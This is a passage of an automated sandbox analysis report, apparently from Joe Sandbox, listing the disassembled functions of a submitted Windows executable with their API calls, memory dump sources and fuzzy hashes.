                                                                                                  • Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
                                                                                                  • Opcode Fuzzy Hash: 87b043840bccf8d419c48135c9b91d602ea162d30e7752f025b60efd79ea1da3
                                                                                                  • Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
                                                                                                  Function 0091E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: f7b6bca9f80646e469956902cbbd4fc392ccaad9d8af98390550622e6635a8c4
                                                                                                  • Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
                                                                                                  • Opcode Fuzzy Hash: f7b6bca9f80646e469956902cbbd4fc392ccaad9d8af98390550622e6635a8c4
                                                                                                  • Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
                                                                                                  Function 0091E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E3FC
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: b1058520ebffd7b1138169d2615fdf5d0b1956667621c2c28441c9849618e4f1
                                                                                                  • Instruction ID: d50e3e184712c1010c4023df440df97c86c2a41ae055a5342d86fb52645e969e
                                                                                                  • Opcode Fuzzy Hash: b1058520ebffd7b1138169d2615fdf5d0b1956667621c2c28441c9849618e4f1
                                                                                                  • Instruction Fuzzy Hash: 9AA011E23AC02ABC300822002C03CBB022CC8C0B28330882EFC22A0080A88008820833
                                                                                                  Function 0091E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 6c13a0fd69308af765ff6bd595fcd641c3aa409c31bb872c6f83e930da40de71
                                                                                                  • Instruction ID: c7208ca6a5fb736802fc054223e380d8efc27b4e01bf5db1c297f171e16f6dbb
                                                                                                  • Opcode Fuzzy Hash: 6c13a0fd69308af765ff6bd595fcd641c3aa409c31bb872c6f83e930da40de71
                                                                                                  • Instruction Fuzzy Hash: 96A011C2BA820ABC300822A02C03CBB022EC8C0B2C330882EFC02A0080A8800C820830
                                                                                                  Function 0091E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: e026a58d4084fedfc52673fef21426219d3bf037cf554f4dd0fea8f6b0187cf2
                                                                                                  • Instruction ID: c7208ca6a5fb736802fc054223e380d8efc27b4e01bf5db1c297f171e16f6dbb
                                                                                                  • Opcode Fuzzy Hash: e026a58d4084fedfc52673fef21426219d3bf037cf554f4dd0fea8f6b0187cf2
                                                                                                  • Instruction Fuzzy Hash: 96A011C2BA820ABC300822A02C03CBB022EC8C0B2C330882EFC02A0080A8800C820830
                                                                                                  Function 0091E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 3948c8cb0670576adc49fc225a73b839508d7eb16439ab5b77dd0e7149300273
                                                                                                  • Instruction ID: 287aa3b94e597aba1c2c8d04ffd2033efc9959b779afa3ed5fd2e47620da2628
                                                                                                  • Opcode Fuzzy Hash: 3948c8cb0670576adc49fc225a73b839508d7eb16439ab5b77dd0e7149300273
                                                                                                  • Instruction Fuzzy Hash: 12A011C23A880ABC300822002C03CBB022EC8C2F28330882EFC0280080A8800C820A30
                                                                                                  Function 0091E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: d22620aa065b17bc5e5b12edfe84bcf40c257864b84bfdcd53ed3e40fbdeb004
                                                                                                  • Instruction ID: 287aa3b94e597aba1c2c8d04ffd2033efc9959b779afa3ed5fd2e47620da2628
                                                                                                  • Opcode Fuzzy Hash: d22620aa065b17bc5e5b12edfe84bcf40c257864b84bfdcd53ed3e40fbdeb004
                                                                                                  • Instruction Fuzzy Hash: 12A011C23A880ABC300822002C03CBB022EC8C2F28330882EFC0280080A8800C820A30
                                                                                                  Function 0091E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: b34aba33af429b463a3cdca8cf05a0b6931b2a06325daa764bc406310c272758
                                                                                                  • Instruction ID: 287aa3b94e597aba1c2c8d04ffd2033efc9959b779afa3ed5fd2e47620da2628
                                                                                                  • Opcode Fuzzy Hash: b34aba33af429b463a3cdca8cf05a0b6931b2a06325daa764bc406310c272758
                                                                                                  • Instruction Fuzzy Hash: 12A011C23A880ABC300822002C03CBB022EC8C2F28330882EFC0280080A8800C820A30
                                                                                                  Function 0091E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E580
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 5b68ae2c7fc0fba89c7ab6e413689fe92ec7e0abe1db0988ba7e3c28ba376365
                                                                                                  • Instruction ID: 47a464e1ff6c46d7ebd26af5b40b1b4a9dbdc3d5b1acfcffcfa2dafb44945d29
                                                                                                  • Opcode Fuzzy Hash: 5b68ae2c7fc0fba89c7ab6e413689fe92ec7e0abe1db0988ba7e3c28ba376365
                                                                                                  • Instruction Fuzzy Hash: E2A011C2BA820A3C300822A02C03CBB022EC8C0B2E3308A2EFC00A0080A8800C820830
                                                                                                  Function 0091E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
                                                                                                    • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
                                                                                                    • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                  • String ID:
                                                                                                  • API String ID: 1269201914-0
                                                                                                  • Opcode ID: 060732dbc78263ea5a0773dfd0939096e52a2aa5a2c81c24e279fc830d085b4b
                                                                                                  • Instruction ID: 287aa3b94e597aba1c2c8d04ffd2033efc9959b779afa3ed5fd2e47620da2628
                                                                                                  • Opcode Fuzzy Hash: 060732dbc78263ea5a0773dfd0939096e52a2aa5a2c81c24e279fc830d085b4b
                                                                                                  • Instruction Fuzzy Hash: 12A011C23A880ABC300822002C03CBB022EC8C2F28330882EFC0280080A8800C820A30
                                                                                                  Function 00909F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetEndOfFile.KERNELBASE(?,0090903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00909F0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File
                                                                                                  • String ID:
                                                                                                  • API String ID: 749574446-0
                                                                                                  • Opcode ID: f9a5b4d4b09f9b8e1334e6d2de488d7559b94be56cb44e4991fb163f2e1ee266
                                                                                                  • Instruction ID: bd9a01944b6aa0fd196469bb55bf9b48b3d24aa2616fdf5cb53e9bd8e12670c1
                                                                                                  • Opcode Fuzzy Hash: f9a5b4d4b09f9b8e1334e6d2de488d7559b94be56cb44e4991fb163f2e1ee266
                                                                                                  • Instruction Fuzzy Hash: 72A01230098009469D001B30CA0400C3710E7107C030041945006CA461C71644079A00
                                                                                                  Function 0091AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,0091AE72,C:\Users\user\Desktop,00000000,0094946A,00000006), ref: 0091AC08
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectory
                                                                                                  • String ID:
                                                                                                  • API String ID: 1611563598-0
                                                                                                  • Opcode ID: 50a20f73fd350890931f21e46f65b58b57d6708107639114f19dafa24a449d31
                                                                                                  • Instruction ID: 2e79c926c055df57999d593ea389ccc051620a3b304056bbd5ff2fc0573ced2e
                                                                                                  • Opcode Fuzzy Hash: 50a20f73fd350890931f21e46f65b58b57d6708107639114f19dafa24a449d31
                                                                                                  • Instruction Fuzzy Hash: 75A011302082008B82000B328F0AA0EBAAAAFA2B20F00C028A00080030CB30C820BA00
                                                                                                  Function 00909620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,009095D6,?,?,?,?,?,00932641,000000FF), ref: 0090963B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2962429428-0
                                                                                                  • Opcode ID: edf2cd1fe782dd4ea2cb3ed54b595c6b591d976f87a31b9848b5fa250e3f33d0
                                                                                                  • Instruction ID: bcbcb6e87e5b6d700166c0b257ef3737ea959da2ca8e0d034611a9ddbc235f80
                                                                                                  • Opcode Fuzzy Hash: edf2cd1fe782dd4ea2cb3ed54b595c6b591d976f87a31b9848b5fa250e3f33d0
                                                                                                  • Instruction Fuzzy Hash: 18F082704D5B159FDB308A64C458B92B7ECAF12321F045B1ED0E6429E1D772698D9A40

                                                                                                  Non-executed Functions

                                                                                                  Function 0091C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0091C2B1
                                                                                                  • EndDialog.USER32(?,00000006), ref: 0091C2C4
                                                                                                  • GetDlgItem.USER32(?,0000006C), ref: 0091C2E0
                                                                                                  • SetFocus.USER32(00000000), ref: 0091C2E7
                                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0091C321
                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0091C358
                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0091C36E
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0091C38C
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0091C39C
                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0091C3B8
                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0091C3D4
                                                                                                  • _swprintf.LIBCMT ref: 0091C404
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0091C417
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0091C41E
                                                                                                  • _swprintf.LIBCMT ref: 0091C477
                                                                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0091C48A
                                                                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0091C4A7
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0091C4C7
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0091C4D7
                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0091C4F1
                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0091C509
                                                                                                  • _swprintf.LIBCMT ref: 0091C535
                                                                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0091C548
                                                                                                  • _swprintf.LIBCMT ref: 0091C59C
                                                                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0091C5AF
                                                                                                    • Part of subcall function 0091AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0091AF35
                                                                                                    • Part of subcall function 0091AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0093E72C,?,?), ref: 0091AF84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                  • API String ID: 797121971-1840816070
                                                                                                  • Opcode ID: 40db2ce9338316655fd4a01c2a901321e3742d94181496e29f02c686e6d7bf58
                                                                                                  • Instruction ID: 8444a493f175edb206a4159dec6fc76dde1879a6068c3d565cc1ab7de4f96b8e
